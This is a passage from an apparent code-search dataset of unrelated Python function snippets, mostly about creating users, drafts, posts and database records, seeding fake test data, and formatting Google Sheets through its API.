return None\n\n # Automatically format the sheets\n requests = [\n {\n \"autoResizeDimensions\": {\n \"dimensions\": {\n \"sheetId\": 0,\n \"dimension\": \"COLUMNS\",\n \"startIndex\": 0,\n \"endIndex\": 2\n }\n }\n },\n {\n \"repeatCell\": {\n \"range\": {\n \"sheetId\": 0,\n \"startRowIndex\": 0,\n 
\"endRowIndex\": 1,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 2\n },\n \"cell\": {\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n },\n \"fields\": \"userEnteredFormat(textFormat)\"\n }\n }\n ]\n\n body = {\n 'requests': requests\n }\n\n try:\n sheetsService.spreadsheets().batchUpdate(\n spreadsheetId=spreadsheet_id, body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error", "def list_drafts(self) -> PagingList[Draft]:\n return PagingList(self._generate_drafts, 128)", "def create(requests, user=None):\n return rest.post_multi(resource=_resource, entities=requests, user=user)", "def copy_to_teamusercopy(apps, schema_editor):\n TeamUser = apps.get_model('status', 'TeamUser')\n TeamUserCopy = apps.get_model('status', 'TeamUserCopy')\n\n for teamuser in TeamUser.objects.all():\n if TeamUserCopy.objects.filter(team_id=teamuser.team_id, user_id=teamuser.user_id).count() == 0:\n TeamUserCopy.objects.create(team_id=teamuser.team_id, user_id=teamuser.user_id)\n print('Created %s %s' % (teamuser.team_id, teamuser.user_id))\n else:\n print('Already exists... skipping')", "def test_create_from_dict(session): # pylint:disable=unused-argument\n user = User(username='CP1234567',\n keycloak_guid='1b20db59-19a0-4727-affe-c6f64309fd04')\n\n session.add(user)\n session.commit()\n\n org_type = OrgTypeModel(code='TEST', description='Test')\n session.add(org_type)\n session.commit()\n\n org_status = OrgStatusModel(code='TEST', description='Test')\n session.add(org_status)\n session.commit()\n\n preferred_payment = PaymentTypeModel(code='TEST', description='Test')\n session.add(preferred_payment)\n session.commit()\n\n org = OrgModel()\n org.name = 'Test Org'\n org.org_type = org_type\n org.org_status = org_status\n org.preferred_payment = preferred_payment\n org.save()\n\n invitation_info = {\n 'recipientEmail': 'abc.test@gmail.com',\n 'membership': [\n {\n 'membershipType': 'USER',\n 'orgId': org.id\n }\n ]\n }\n result_invitation = InvitationModel.create_from_dict(invitation_info, user.id, 'STANDARD')\n\n assert result_invitation.id is not None", "def save_draft(self, review_request):\r\n self.api_call('api/review-requests/%s/draft/save/' %\r\n review_request['id'])\r\n self.debug('Review request draft saved')", "def post_list(self, request, **kwargs):\n deserialized = self.deserialize(request, request.raw_post_data, format=request.META.get('CONTENT_TYPE', 'application/json'))\n\n # Force this in an ugly way, at least should do \"reverse\"\n deserialized[\"user\"] = \"/api/v1/user/%s/\" % request.user.id\n bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized))\n self.is_valid(bundle, request)\n updated_bundle = self.obj_create(bundle, request=request)\n return HttpCreated(location=self.get_resource_uri(updated_bundle))", "def delete_drafts(request):\n query = models.Comment.query(\n models.Comment.author == request.user, models.Comment.draft == True,\n ancestor=request.issue.key)\n keys = query.fetch(keys_only=True)\n ndb.delete_multi(keys)\n request.issue.calculate_draft_count_by_user()\n request.issue.put()\n return HttpResponseRedirect(\n reverse(publish, args=[request.issue.key.id()]))", "def create_dict(self, dict_type, upload_id, download_id,\n pub_user, module_supplier_id):\n response = self.do_request(\n self.base_url +\n \"/oasis/create\" + self.types[dict_type] + \"/\" +\n pub_user + \"/\" +\n str(module_supplier_id) + \"/\" +\n str(upload_id) + \"/\" +\n str(download_id) + \"/\"\n )\n return response", 
"def create_guests(self) -> None:\n\n assert self.shelf\n\n from .return_guest_to_shelf import return_guest_to_shelf\n\n for _ in range(self.guest_count):\n guestname = str(uuid.uuid4())\n\n stmt = GuestRequest.create_query(\n guestname=guestname,\n environment=self.environment,\n ownername=self.shelf.ownername,\n shelfname=self.shelfname,\n ssh_keyname=self.guest_template.keyname,\n ssh_port=DEFAULT_SSH_PORT,\n ssh_username=DEFAULT_SSH_USERNAME,\n priorityname=self.guest_template.priority_group,\n user_data=self.guest_template.user_data,\n skip_prepare_verify_ssh=self.guest_template.skip_prepare_verify_ssh,\n post_install_script=self.guest_template.post_install_script,\n log_types=self.log_types,\n watchdog_dispatch_delay=self.guest_template.watchdog_dispatch_delay,\n watchdog_period_delay=self.guest_template.watchdog_period_delay,\n bypass_shelf_lookup=True,\n on_ready=[(return_guest_to_shelf, [GuestState.READY.value])]\n )\n\n r_guest = execute_db_statement(self.logger, self.session, stmt)\n\n if r_guest.is_error:\n self.result = self.handle_error(r_guest, 'failed to create new guest')\n return\n\n GuestRequest.log_event_by_guestname(\n self.logger, # shelf logger, does not contain guestname\n self.session,\n guestname,\n 'created',\n **{\n 'environment': self.environment.serialize(),\n 'user_data': self.guest_template.user_data\n }\n )\n\n self.request_task(guest_shelf_lookup, guestname)\n\n if self.result:\n return", "def create_matching_proposals(self):\n user_id = self.context['request'].user.pk\n\n query = \"\"\"\n INSERT INTO public.core_proposal (form_id, offer_id, status, created_at) \n SELECT public.core_form.id, public.core_offer.id, 'new', %s \n FROM public.core_form INNER JOIN public.core_offer \n ON public.core_offer.min_rating <= public.core_form.rating \n AND public.core_form.rating<= public.core_offer.max_rating \n AND NOT EXISTS \n (SELECT 1 FROM public.core_proposal WHERE public.core_form.id = form_id AND public.core_offer.id = offer_id)\n WHERE public.core_form.user_id=%s\n RETURNING form_id, offer_id, id\n \"\"\".strip()\n\n with connection.cursor() as cursor:\n cursor.execute(\n query,\n [date.today().strftime('%Y-%m-%d'), user_id]\n )\n rows = cursor.fetchall()\n if not rows:\n return None\n\n proposal_ids = []\n for row in rows:\n proposal_ids.append(row[2])\n\n proposals = Proposal.objects.filter(pk__in=proposal_ids)\n items = []\n for proposal in proposals:\n form = proposal.form\n offer = proposal.offer\n form_dict = form.__dict__\n offer_dict = offer.__dict__\n del form_dict['_state']\n del offer_dict['_state']\n items.append((form_dict, offer_dict, proposal.pk))\n\n for item in items:\n make_pdf.apply_async(\n args=(\n item[0], item[1], item[2]\n )\n )", "def backup_all(users_dict: dict, start_idx: int, num_checked_emails: int)\\\n -> None:\n backup_users_dict(users_dict)\n backup_int_in_fname(start_idx, START_IDX_FNAME)\n backup_int_in_fname(num_checked_emails, CHECKED_EMAILS_FNAME)", "def _add_draft_modules_to_course(self, published_course_key, course_key, user):\r\n # each true update below will trigger a new version of the structure. 
We may want to just have one new version\r\n # but that's for a later date.\r\n new_draft_course_loc = published_course_key.for_branch('draft')\r\n # to prevent race conditions of grandchilden being added before their parents and thus having no parent to\r\n # add to\r\n awaiting_adoption = {}\r\n for module in self.draft_modulestore.get_items(course_key):\r\n if getattr(module, 'is_draft', False):\r\n new_locator = self.loc_mapper.translate_location(\r\n module.location, False, add_entry_if_missing=True\r\n )\r\n if self.split_modulestore.has_item(new_locator):\r\n # was in 'direct' so draft is a new version\r\n split_module = self.split_modulestore.get_item(new_locator)\r\n # need to remove any no-longer-explicitly-set values and add/update any now set values.\r\n for name, field in split_module.fields.iteritems():\r\n if field.is_set_on(split_module) and not module.fields[name].is_set_on(module):\r\n field.delete_from(split_module)\r\n for name, field in module.fields.iteritems():\r\n # draft children will insert themselves and the others are here already; so, don't do it 2x\r\n if name != 'children' and field.is_set_on(module):\r\n field.write_to(split_module, field.read_from(module))\r\n\r\n _new_module = self.split_modulestore.update_item(split_module, user.id)\r\n else:\r\n # only a draft version (aka, 'private'). parent needs updated too.\r\n # create a new course version just in case the current head is also the prod head\r\n _new_module = self.split_modulestore.create_item(\r\n new_draft_course_loc, module.category, user.id,\r\n block_id=new_locator.block_id,\r\n fields=self._get_json_fields_translate_references(module, course_key, True)\r\n )\r\n awaiting_adoption[module.location] = new_locator\r\n for draft_location, new_locator in awaiting_adoption.iteritems():\r\n for parent_loc in self.draft_modulestore.get_parent_locations(draft_location):\r\n old_parent = self.draft_modulestore.get_item(parent_loc)\r\n new_parent = self.split_modulestore.get_item(\r\n self.loc_mapper.translate_location(old_parent.location, False)\r\n )\r\n # this only occurs if the parent was also awaiting adoption\r\n if any(new_locator == child.version_agnostic() for child in new_parent.children):\r\n break\r\n # find index for module: new_parent may be missing quite a few of old_parent's children\r\n new_parent_cursor = 0\r\n for old_child_loc in old_parent.children:\r\n if old_child_loc == draft_location:\r\n break\r\n sibling_loc = self.loc_mapper.translate_location(old_child_loc, False)\r\n # sibling may move cursor\r\n for idx in range(new_parent_cursor, len(new_parent.children)):\r\n if new_parent.children[idx].version_agnostic() == sibling_loc:\r\n new_parent_cursor = idx + 1\r\n break\r\n new_parent.children.insert(new_parent_cursor, new_locator)\r\n new_parent = self.split_modulestore.update_item(new_parent, user.id)", "def create_from_dict(user_data_dict: dict):\n empty = create_empty()\n user_data = _dict_to_dict(empty, user_data_dict)\n return user_data", "def test_create_with_existing_new_draft(self):\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n rich_text=True,\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n # Create the first draft.\n orig_draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(orig_draft.changedesc)\n\n # Try to create it again.\n draft = ReviewRequestDraft.create(review_request)\n 
self.assertIsNotNone(draft.changedesc)\n\n self.assertEqual(orig_draft, draft)\n self.assertEqual(orig_draft.changedesc, draft.changedesc)", "def drafts_view(self, request, object_id, extra_context=None):\n opts = self.model._meta\n action_list = [{\"revision\": version.revision,\n \"url\": reverse(\"admin:%s_%s_draft\" % (opts.app_label, opts.module_name), args=(version.object_id, version.revision.id))}\n for version in self.get_draft_versions(object_id).select_related(\"revision\")]\n context = {\n \"action_list\": action_list, \n \"title\": _(\"Unpublished items\"), \n 'draft_view':True, \n 'has_draft':self.has_draft(object_id)\n }\n context.update(extra_context or {})\n return super(EasyPublisher, self).history_view(request, object_id, context)", "def create_advisors(_advisors_data):\n\n for advisor_data in _advisors_data:\n occupations = advisor_data.pop('occupations', '').strip()\n specialties = advisor_data.pop('specialties', '').strip()\n subspecialties = advisor_data.pop('subspecialties', '').strip()\n prev_firms = advisor_data.pop('previous_firms', '').strip()\n curr_firm_name = advisor_data.pop('current_firm_name', '').strip()\n location = advisor_data.pop('location', '').strip()\n\n city, state_abbr = location.split(', ') if location.count(',') == 1 else (None, '')\n\n advisor_data['city'] = city\n advisor_data['state'] = ABBR_TO_STATE.get(state_abbr, 'Other')\n\n advisor_data['status'] = 'Active'\n\n success, result = create_advisor(advisor_data)\n validate(success, result)\n\n advisor = result\n\n occupation_objs = []\n\n if occupations:\n for occupation_name in occupations.split(', '):\n if occupation_name not in OCCUPATIONS:\n continue\n\n success, result = create_occupation({'name': occupation_name.strip().title()})\n validate(success, result)\n\n occupation = result\n occupation_objs.append(occupation)\n\n advisor.occupations.append(occupation)\n\n db.session.commit()\n\n if specialties:\n for specialty_name in specialties.split(', '):\n\n spec_occ = None\n for occupation in occupation_objs:\n if specialty_name in OCCUPATIONS[occupation.name]:\n spec_occ = occupation\n break\n\n if not spec_occ:\n continue\n\n success, result = create_specialty({\n 'name': specialty_name.strip().title(),\n 'occupation_id': spec_occ.pk_id,\n 'occupation': spec_occ\n })\n\n validate(success, result)\n\n specialty = result\n advisor.specialties.append(specialty)\n\n db.session.commit()\n\n if subspecialties:\n advisor.subspecialty_text = subspecialties\n\n db.session.commit()\n\n if prev_firms:\n for prev_firm_name in prev_firms.split(', '):\n success, result = create_bigfirm({'name': prev_firm_name.strip()})\n validate(success, result)\n\n big_firm = result\n advisor.previous_firms.append(big_firm)\n\n db.session.commit()\n\n if curr_firm_name:\n success, result = create_bigfirm({'name': curr_firm_name.strip()})\n validate(success, result)\n\n big_firm = result\n advisor.current_firm = big_firm\n advisor.current_firm_id = big_firm.pk_id\n\n db.session.commit()\n\n db.session.commit()", "def test_expected_users(self):\n print()\n print(\"Testing users whose parameters are safe...\")\n for user_id in self.get_unique_ids(100):\n self.store_expected_user(user_id)\n \n User.objects.all().delete()\n print(\"Testing many users whose parameters are safe with bulk_create...\")\n self.store_many_expected_users()\n\n print(\"-\" * 10)", "def test_create_draft_with_update(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n 
)\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'metadata': {'due': '2077-10-10T04:00Z'},\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n published = self.get_item_from_modulestore(self.problem_usage_key, False)\r\n self.assertIsNone(published.due)\r\n draft = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertEqual(draft.due, datetime(2077, 10, 10, 4, 0, tzinfo=UTC))", "def create_post(user_id):\n\n user = User.query.get_or_404(user_id)\n title = request.form['title']\n content = request.form['content']\n tag_ids = [int(num) for num in request.form.getlist(\"tags\")]\n tags = Tag.query.filter(Tag.id.in_(tag_ids)).all()\n \n new_post = Post(title=title, content=content, user=user, tags=tags)\n db.session.add(new_post)\n db.session.commit()\n\n return redirect(f\"/users/{user_id}\")", "async def new_dictionary(message: Message):\n dictionaries = await db.select_dictionaries(message.from_user.id)\n if len(dictionaries) == 10: # Limit in 10 dictionaries for user\n await message.answer(\"Вы не можете создать больше 10 словарей!\")\n else: # Available to add one more dictionaries\n await message.answer(\"Напиши название своего словаря\", reply_markup=ReplyKeyboardRemove())\n await CreateNewDict.SetDictionaryName.set()", "def drafts():\n query = Entry.drafts().order_by(Entry.last_mod_date.desc())\n return object_list('index.html', query)", "def prepare_draft_rulings(self):\r\n records = self.retrieve_cached_records()\r\n if records:\r\n records = self.apply_rulings(records)\r\n records = u.apply_aggregators(\r\n map(lambda rc: (rc[0], rc[2]), self.ruling_columns),\r\n records\r\n )\r\n else:\r\n records = [] # might be None\r\n\r\n u.write_excel(\r\n records,\r\n self.draft_ruling_path,\r\n OrderedDict(map(lambda rc: (rc[0], rc[1]), self.ruling_columns)),\r\n )", "def _generate_users(self):\n users = {}\n args = self._add_user()\n #Grab info from args\n users[args[\"userID\"]] = {}\n users[args[\"userID\"]][\"name\"] = args[\"name\"]\n users[args[\"userID\"]][\"webhook_url\"] = args[\"webhook_url\"]\n users[args[\"userID\"]][\"blacklist\"] = args[\"blacklist\"]\n #Try to grab override info, default to blank if doesn't exist\n users[args[\"userID\"]][\"override_user\"] = args.get(\"overrideUser\", \"\")\n users[args[\"userID\"]][\"override_userid\"] = args.get(\"overrideUserID\", \"\")\n users[args[\"userID\"]][\"override_oauth\"] = args.get(\"overrideOauth\", \"\")\n fileIO.save_json(\"users.json\", users)", "def create_item(self, user: User, **kwargs) -> None:", "def create_user_emails_sheets_subscribers():\n input_range = \"Sheet1\"\n\n sheetsService = build(\n 'sheets', 'v4', credentials=credentials, cache_discovery=False)\n\n # Empty sheet\n sheetsService.spreadsheets().values().clear(\n spreadsheetId=spreadsheet_id, range=input_range).execute()\n\n # Get all basic users' email\n users = list(User.objects.filter(is_active=True,\n role=\"BU\").values('email', 'profile_id'))\n\n # Check their consent status and update accordingly\n subscribers = []\n for user in users:\n if user['profile_id'] != None:\n profile = SubscriberProfile.objects.get(id=user['profile_id'])\n status = profile.consent_status\n if status == \"IMPLIED\" and profile.expired_at < date.today():\n profile.consent_status = \"EXPIRED\"\n profile.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n 
user.pop('profile_id')\n user.update({\"first_name\": profile.first_name,\n \"last_name\": profile.last_name, \"consent_status\": profile.consent_status})\n subscribers.append(user)\n\n # Get newsletter only users' email\n nlusers = list(NLUser.objects.all())\n\n # Check their consent status and update accordingly\n for nluser in nlusers:\n status = nluser.consent_status\n if status == \"IMPLIED\" and nluser.expired_at < date.today():\n nluser.consent_status = \"EXPIRED\"\n nluser.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n subscribers.append({\"email\": nluser.email, \"first_name\": nluser.first_name,\n \"last_name\": nluser.last_name, \"consent_status\": nluser.consent_status})\n\n # Append user info into values (only users that has email verified)\n values = [['Email', 'First name', 'Last name', 'Consent Status']]\n for subscriber in subscribers:\n values.append(list(subscriber.values()))\n\n body = {\n 'values': values\n }\n\n try:\n sheetsService.spreadsheets().values().update(spreadsheetId=spreadsheet_id, range=input_range,\n valueInputOption=\"USER_ENTERED\", body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error\n # return None\n\n # Automatically format the sheets\n requests = [\n {\n \"autoResizeDimensions\": {\n \"dimensions\": {\n \"sheetId\": 0,\n \"dimension\": \"COLUMNS\",\n \"startIndex\": 0,\n \"endIndex\": 4\n }\n }\n },\n {\n \"repeatCell\": {\n \"range\": {\n \"sheetId\": 0,\n \"startRowIndex\": 0,\n \"endRowIndex\": 1,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 4\n },\n \"cell\": {\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n },\n \"fields\": \"userEnteredFormat(textFormat)\"\n }\n }\n ]\n\n body = {\n 'requests': requests\n }\n\n try:\n sheetsService.spreadsheets().batchUpdate(\n spreadsheetId=spreadsheet_id, body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error", "def test_save_draft():\n with open(basedir + \"fixture/7149593_formatted.json\", \"r\") as f:\n storage.save_draft(user_id, \"bib\", \"7149593\", f.read(), \"1362044230872\")\n with open(basedir + \"some/path/\" + user_id + \"/bib/7149593\", \"r\") as f:\n json_data = json.loads(f.read())\n assert json_data['document']['@id'].rsplit(\"/\",1)[1] == '7149593'\n assert json_data['etag'] == \"1362044230872\"", "def test_transitions_create_suspended(self):\n\n self.transition_data['status'] = 'SUSPENDED'\n\n transition = self.client.users(\n self.user.token).transitions.create(self.transition_data)\n\n verify_user_transition(self, transition, self.transition_data)", "def get_or_create_bundle_draft(bundle_uuid, draft_name):\n bundle = get_bundle(bundle_uuid)\n try:\n return get_draft(bundle.drafts[draft_name]) # pylint: disable=unsubscriptable-object\n except KeyError:\n # The draft doesn't exist yet, so create it:\n response = api_request('post', api_url('drafts'), json={\n \"bundle_uuid\": str(bundle_uuid),\n \"name\": draft_name,\n })\n # The result of creating a draft doesn't include all the fields we want, so retrieve it now:\n return get_draft(UUID(response[\"uuid\"]))", "def post(self, *args, **kwargs):\n name = self.get_argument('name', None)\n description = self.get_argument('description', None)\n url = self.get_argument('url', None)\n leader = self.get_argument('leader', None)\n members = self.get_argument('members', None)\n teams = self.get_argument('teams', None)\n repos = self.get_argument('repos', None)\n tags = self.get_argument('tags', 
None)\n if 'user' not in kwargs:\n self.raise401()\n\n try:\n # todo - better arguments handler\n url = url.strip()\n url = url if url else None\n members_list = []\n repos_list = []\n teams_list = []\n project_leader = kwargs['user']\n if leader:\n project_leader = User.objects(username=leader).first()\n\n if repos:\n for repo in parse_listed_strs(repos):\n r = Repo.objects(name=repo).first()\n if not r:\n continue\n repos_list.append(r)\n if members:\n for member in parse_listed_strs(members):\n u = User.objects(username=member).first()\n if not u or u == project_leader:\n continue\n members_list.append(u)\n if teams:\n for team in parse_listed_strs(teams):\n t = Team.objects(name=team).first()\n if not t:\n continue\n teams_list.append(t)\n members_list.append(project_leader)\n tags_list = parse_listed_strs(tags)\n project = Project(\n name=name, description=description,\n url=url, repos=repos_list,\n leader=project_leader, members=members_list,\n teams=teams_list, tags=tags_list)\n project.save()\n project_data = document_to_json(project, filter_set=_FILTER)\n self.set_status(201)\n self.write(project_data)\n except Exception as e:\n reason = e.message\n self.raise400(reason=reason)", "def test_make_draft(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'create_draft'}\r\n )\r\n # Update the draft version and check that published is different.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'metadata': {'due': '2077-10-10T04:00Z'}}\r\n )\r\n published = self.get_item_from_modulestore(self.problem_usage_key, False)\r\n self.assertIsNone(published.due)\r\n draft = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertEqual(draft.due, datetime(2077, 10, 10, 4, 0, tzinfo=UTC))", "def new(user, requested_players):\n main_grid = [[0]*9 for _ in range(9)]\n wallv_grid = [[0]*8 for _ in range(9)]\n wallh_grid = [[0]*9 for _ in range(8)]\n wallfills_grid = [[0]*8 for _ in range(8)]\n game_id = randint(0, 1000000)\n last_status = json.dumps({\"status\": \"Waiting for other players to join...\",\n \"waiting\": True})\n if requested_players == \"two\":\n# while TwoPlayerGame.objects.filter(game_id=game_id):\n# game_id = randint(0, 10000)\n user.two_player_game_id = game_id\n main_grid[0][4] = 1\n main_grid[8][4] = 2\n TwoPlayerGame.objects.create(\n game_id=game_id,\n player1=user,\n player1_walls=10,\n player2_walls=10,\n main_grid=json.dumps(main_grid),\n wallv_grid=json.dumps(wallv_grid),\n wallh_grid=json.dumps(wallh_grid),\n wallfills_grid=json.dumps(wallfills_grid),\n last_status=last_status,\n turn=user)\n if requested_players == \"four\":\n# while FourPlayerGame.objects.filter(game_id=game_id):\n# game_id = randint(0, 10000)\n user.four_player_game_id = game_id\n main_grid[0][4] = 1\n main_grid[8][4] = 2\n main_grid[4][0] = 3\n main_grid[4][8] = 4\n FourPlayerGame.objects.create(\n game_id=game_id,\n player1=user,\n player1_walls=5,\n player2_walls=5,\n player3_walls=5,\n player4_walls=5,\n main_grid=json.dumps(main_grid),\n wallv_grid=json.dumps(wallv_grid),\n wallh_grid=json.dumps(wallh_grid),\n wallfills_grid=json.dumps(wallfills_grid),\n last_status=last_status,\n turn=user)\n user.save()\n return", "def _create_instance(self, user_id, 
project_id):\n inst = {}\n inst['user_id'] = user_id\n inst['project_id'] = project_id\n\n return db.instance_create(self.context, inst)", "def create_post(user_id):\n if CURRENT_USER_KEY not in session or session[CURRENT_USER_KEY] != user_id:\n raise Unauthorized\n\n user = User.query.get_or_404(user_id)\n\n form = PostForm()\n form.muscles.choices = [(m.id, m.name) for m in Muscle.query.all()]\n form.equipment.choices = [(e.id, e.name) for e in Equipment.query.all()]\n # import pdb\n # pdb.set_trace()\n if form.validate_on_submit():\n title = form.title.data\n details = form.details.data\n is_private = form.is_private.data\n muscles = form.muscles.data\n equipment = form.equipment.data\n post = Post(title=title, details=form.details.data,\n is_private=form.is_private.data, user_id=user_id)\n db.session.add(post)\n db.session.commit()\n\n # create join table additions\n muscles_to_add = []\n equipment_to_add = []\n for muscle in muscles:\n muscle_post = PostMuscle(post_id=post.id, muscle_id=muscle)\n muscles_to_add.append(muscle_post)\n for choice in equipment:\n equipment_post = PostEquipment(\n post_id=post.id, equipment_id=choice)\n equipment_to_add.append(equipment_post)\n db.session.add_all(muscles_to_add + equipment_to_add)\n db.session.commit()\n flash('New post created!', 'success')\n return redirect(url_for('show_user_profile', user_id=user_id))\n return render_template('add_post.html', form=form, user=user)", "def populate(N=5):\n for entry in range(N):\n # Create the fake data for the entry\n fake_name = fakegen.name().split()\n fake_first_name = fake_name[0]\n fake_last_name = fake_name[1]\n fake_email = fakegen.email()\n\n # Create the new User entry\n user = User.objects.get_or_create(first_name=fake_first_name, last_name=fake_last_name, email=fake_email)[0]", "def create_new_toppings(user_data):\n new_topping_res = requests.post(url=\"http://127.0.0.1:5000/create_new_toppings\", json=user_data)\n return new_topping_res.text", "def post(self): # pylint:disable-msg=C0103\n response = {'batch_populated': False}\n try:\n # Will raise an AttributeError if no current user\n user_id = users.get_current_user().user_id()\n # TODO: return 400 if not logged in\n work = []\n for row, column in RandomRowColumnOrdering(ROWS, COLUMNS):\n args = (row, column, user_id)\n work.append((SendColor, args, {})) # No keyword args\n\n PopulateBatch(user_id, work)\n response['batch_populated'] = True\n except: # pylint:disable-msg=W0702\n # TODO: Consider logging traceback.format_exception(*sys.exc_info()) here\n pass\n self.response.write(json.dumps(response))", "def populate_poll(user=\"\",total=10):\n user_list = None\n #create random user only when user argument empty\n if user == \"\":\n create_random_user(20)\n user_list = User.objects.all()\n \n for i in range(total):\n Question.objects.create(\n created_by=random.choice(user_list) if user_list is not None else user,\n title=create_random_string(seed_random(10)),\n text=create_random_string(seed_random(300)),\n slug=create_random_string(seed_random(100)) )", "def create_person(data_dict, m2m_dict):\n email_address = data_dict['email_address']\n # check if the person already exists:\n try:\n exists = Person.objects.get(email_address=email_address)\n create_message = f'Skipping: Person with {email_address} already exists.'\n except:\n # try:\n person_obj, person_created = Person.objects.update_or_create(**data_dict)\n # populate MANY-TO-MANY fields\n if m2m_dict:\n # created_by (FK)\n created_by_email = m2m_dict['created_by']\n user, 
user_created = User.objects.get_or_create(email=created_by_email)\n person_qs = Person.objects.filter(email_address=person_obj.email_address)\n person_qs.update(created_by=user)\n # expertise (M2M)\n expertise_values = m2m_dict['expertise']\n if expertise_values:\n values_list = [value.strip() for value in expertise_values.split(',')]\n for value in values_list:\n expertise_obj, expertise_created = Expertise.objects.get_or_create(name=value)\n person_obj.expertise.add(expertise_obj)\n # industry (M2M)\n industry_values = m2m_dict['industries']\n if industry_values:\n values_list = [value.strip() for value in industry_values.split(',')]\n for value in values_list:\n industry_obj, industry_created = Industry.objects.get_or_create(name=value)\n person_obj.industries.add(industry_obj)\n # organization (M2M)\n organization_values = m2m_dict['organization']\n if organization_values:\n values_list = [value.strip() for value in organization_values.split(',')]\n for value in values_list:\n organization_obj, organization_created = Organization.objects.get_or_create(name=value)\n person_obj.organization.add(organization_obj)\n # owned by (M2M)\n exportable_by_values = m2m_dict['exportable_by']\n if exportable_by_values:\n values_list = [value.strip() for value in exportable_by_values.split(',')]\n for value in values_list:\n dive_obj, dive_created = Dive.objects.get_or_create(name=value)\n person_obj.exportable_by.add(dive_obj)\n # let us know how it went\n if person_created:\n create_message = f'Success: {person_obj}'\n else:\n create_message = f'Failed: {person_obj}'\n # except Exception as e:\n # create_message = f'Error for {email_address}: {e}\\n'\n print(create_message)\n # except:\n # failed_rows.append(counter)\n # try:\n # obj, created = Person.objects.create(**csv_to_model)\n # except:\n # message = 'Create person' + str(sys.exc_info())\n # print(message)", "def create_user(schools_dictionnary, domains_to_skills_dictionnary, companies, places, skills_oh, places_oh, domains_oh, rng, _id):\n\n age = rng.randint(20,60)\n schools = rng.choice(list(schools_dictionnary.keys()), rng.choice([1, 2], p = [0.95, 0.05]), replace = False) \n\n available_skills = list(set([skill for school in schools \\\n for domain in schools_dictionnary[school].domains \\\n for skill in domains_to_skills_dictionnary[domain]]))\n\n expo = np.round(rng.exponential(0.3) * len(schools)) + age // 17 + 1\n\n nb_skills_to_choose = min(int(expo), 5 + (len(schools) - 1) * 3)\n\n _skills = rng.choice(available_skills, nb_skills_to_choose, replace = False)\n\n company = rng.choice(companies)\n place = rng.choice(places)\n\n user = User(skills_oh, places_oh, domains_oh, schools_dictionnary, skills = _skills, age = age, place = place, company = company,\n schools = schools, _id = _id)\n\n return user", "def create_set_of_fake_data(\n user_count=10,\n post_count_max_per_user=1,\n post_comments_max_per_post=2):\n\n for user in range(user_count):\n new_user = create_user(user_count)\n\n # For this new user, create some posts\n nb_posts = randint(1, post_count_max_per_user)\n for post in range(nb_posts):\n create_post(\n user=new_user,\n post_count_max_per_user=post_count_max_per_user\n )\n\n # For each created user, create some comments\n # Hence, a post may have no comments\n new_users = User.objects.all()\n new_posts = Post.objects.all()\n for user in new_users:\n post = new_posts[randint(0, len(new_posts) - 1)]\n create_comments(\n user=user,\n related_post=post,\n post_comments_max_per_post=post_comments_max_per_post\n )", "def 
update_draft(self, version, request):\n for metadata in version.revision.easypublishermetadata_set.all():\n if request.user.has_perm(\"easypublisher.can_approve_for_publication\"): \n metadata.status = 'published'\n # save all other drafts for this object as declined, because we\n # chose to save a different one\n for other in EasyPublisherMetaData.objects.filter(\n revision__version__object_id=version.object_id, \n revision__version__content_type=version.content_type):\n other.status = 'declined'\n other.save()\n else:\n metadata.status = 'updated'\n metadata.save()", "def record_create_for_user(project_id, user_id, values):\n values['project_id'] = project_id\n values['user_id'] = user_id\n\n session = get_session()\n with session.begin():\n record_ref = models.UserAccountRecord()\n record_ref.update(values)\n record_ref.save(session=session)", "def post_integrations_action_draft_test(self, action_id, body, **kwargs):\n\n all_params = ['action_id', 'body']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method post_integrations_action_draft_test\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'action_id' is set\n if ('action_id' not in params) or (params['action_id'] is None):\n raise ValueError(\"Missing the required parameter `action_id` when calling `post_integrations_action_draft_test`\")\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `post_integrations_action_draft_test`\")\n\n\n resource_path = '/api/v2/integrations/actions/{actionId}/draft/test'.replace('{format}', 'json')\n path_params = {}\n if 'action_id' in params:\n path_params['actionId'] = params['action_id']\n\n query_params = {}\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n 